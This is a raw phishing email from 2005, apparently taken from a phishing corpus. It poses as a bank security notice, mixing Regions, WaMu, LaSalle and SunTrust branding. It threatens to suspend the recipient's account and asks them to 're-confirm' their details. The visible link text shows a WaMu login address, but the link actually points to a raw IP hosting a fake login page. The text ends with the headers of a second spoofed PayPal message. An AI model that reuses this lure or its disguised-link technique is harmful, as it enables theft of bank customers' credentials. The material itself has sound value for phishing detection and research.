From: "Regions Bank Security Department" <support@regions.com>
Reply-To: "Regions Bank Security Service" <confirm@regions.com>
To: jose@monkey.org
Subject: Fraud Prevention Measures
Date: Tue, 28 Jun 2005 03:54:21 +0600
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="--65581157978474262806"
X-Priority: 1
X-MSMail-Priority: High
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 68

----65581157978474262806
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<style type=3D"text/css">
<!--
style1 {
	color: #FF0000;
	font-weight: bold;
}
style2 {
	font-family: Tahoma;
	font-size: 12px;
}
style4 {font-size: 10}
style7 {font-size: 12px}
-->
</style>
<span class=3D"style2"><img src=3Dhttp://www.wamu.com/images/wamucom_logo_=
blue.gif><br>

</span>
<table>
<tr>
<td class=3D"style2">Dear Customer,                                       =
      </td>
</tr>
</table>

<span class=3D"style2"><br>

</span><BR>
<p align=3Dleft class=3D"style2">
We recently have determined that different computers have logged onto
your Online Banking account, and multiple password failures were
present before the logons. We now need you to re-confirm your account
information to us. If this is not completed by <b>July 02 2005</b>,
we will be forced to suspend your account indefinitely, as it may have
been used for fraudulent purposes. We thank you for your cooperation in
this manner.<br>
<br>
To confirm your Online Banking records click here:<br>
<br>
<a target=3D"_blank" href=3D"http://67.162.223.217/pictures/LaSalle/Lasall=
e/index.php">
https://login.personal.wamu.com/logon/logon.asp?dd=3D1</a><br>
<br>
We apologize for any inconvenience this may cause, and appreciate your 
assistance in helping us maintain the integrity of<br>the entire LaSalle B=
ank 
system. Thank you for attention to this matter.<br>

<br>
<br>
<br>
Sincerely,<br>
<br>
The LaSalle Bank Team<br>
<br>
Please do not reply to this e-mail. Mail sent to this address cannot be 
answered. For assistance, log in to your<br>LaSalle Bank account and choos=
e 
the "Help" link in the header of any page.





</p>
<table width=3D"50%" cellspacing=3D"0" cellpadding=3D"0" border=3D"0">
	<tr>
    	<td class=3D"style2"><div align=3D"center"><br>
      </div></td>
	</tr>
	<tr>
    	<td align=3D"center" class=3D"style2">
			<table width=3D"550" cellspacing=3D"0" cellpadding=3D"0" border=3D"0">
				<tr>
    				<td><div align=3D"left" class=3D"footerText">
    				  <div align=3D"center"><nobr><span class=3D"style2			            =
SunTrust Banks, Inc. All 
                      rights reserved.<br> 
                      Equal Housing Lender - Member FDIC</span></nobr></di=
v>
    				</div></td>
				</tr>
				<tr>
    				<td><div align=3D"center" class=3D"footerText"><br>
                        <span class=3D"style7"> <a class=3D"linkFooter" hr=
ef=3D"http://www.wamu.com/common/Frameset/Investor_Relations/frameset.asp?=
source=3Dhttp://www.shareholder.com/suntrust/" target=3D"_self">Investor 
                    Relations</a>  | <a class=3D"linkFooter" href=3D"https=
://www2.wamu.com/privacy.html" target=3D"_self">Privacy</a>  | <a class=3D=
"linkFooter" href=3D"https://www2.wamu.com/security.html" target=3D"_self"=
>Security</a>  | <a class=3D"linkFooter" href=3D"https://www2.wamu.com/abo=
utsite.html" target=3D"_self">About 
                    Our Site</a> | <a class=3D"linkFooter" href=3D"http://=
www.wamu.com/common/SiteMap/index.asp" target=3D"_self">Site Map</a>  | <a=
 class=3D"linkFooter" href=3D"http://www.wamu.com/alert/index.asp" target=3D=
"_self">About Email Fraud</a>
                        </span></div></td>
				</tr>
			</table>
		</td>
	</tr>
</table>


----65581157978474262806--

From service@paypal.com  Mon Jun 27 21:07:06 2005
Return-Path: <service@paypal.com>
X-Original-To: jose@login.monkey.org
Delivered-To: jose@login.monkey.org
Received: from mail1.monkey.org (mail1.monkey.org [65.23.81.153])
	by naughty.monkey.org (Postfix) with ESMTP id 7D13B536EC1
	for <jose@login.monkey.org>; Mon, 27 Jun 2005 21:07:06 -0400 (EDT)
Received: from mail2.monkey.org (mail2.monkey.org [204.181.64.8])
	by mail1.monkey.org (Postfix) with ESMTP id AE85985A98F
	for <jose@monkey.org>; Mon, 27 Jun 2005 21:07:05 -0400 (EDT)
Received: from 204.181.64.8 (unknown [209.200.117.131])
	by mail2.monkey.org (Postfix) with SMTP id DE9621836A1
	for <jose@monkey.org>; Mon, 27 Jun 2005 21:07:05 -0400 (EDT)
Received: from 11cwa.fae3h.com [1.157.71.199] by 204.181.64.8 SMTP id V9K5Vt5111QQfJ; Mon, 27 Jun 2005 22:58:10 -0200
Message-ID: <793-778mpii-$5@d8k6d>
